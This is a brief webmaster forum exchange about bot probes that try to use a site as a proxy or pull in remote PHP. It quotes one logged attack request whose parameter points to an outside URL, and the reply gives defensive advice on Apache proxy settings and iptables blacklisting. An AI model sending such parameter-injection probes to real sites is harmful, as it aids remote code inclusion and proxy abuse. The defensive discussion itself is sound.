Someone is trying to see if they can use your website as a
proxy.
Most likely the site that it is coming from has been
compromised itself, so reporting may or may not get a
response.
In Apache you should turn off proxys so the bad guys can't
hide their IP's by using you as an in between.
But turning off proxys isn't enough, if a php application
is written poorly, they might be able to use the php code to do the proxying for
them.
So most likely some BOT was scanning your system, hoping to
find that poorly built php app.
Since you are probably reading about it in an error list,
then you seem to be safe.
If you are getting more than your fair share of these
attempts from the same address, I would add their address to a blacklist in
IPtables.
Hi,
I am working on a website that gets a lot of
exploit attempts.
They mostly look like this:
/index.php?display=http://humano.ya.com/mysons/index.htm?
Our code
is set to disregard any value that is not expected.
I'm
wondering if there is a clearing house for reporting this type of
stuff. I have the IP address as reported.... if that is
accurate.
Thanks in advance!
Keith
|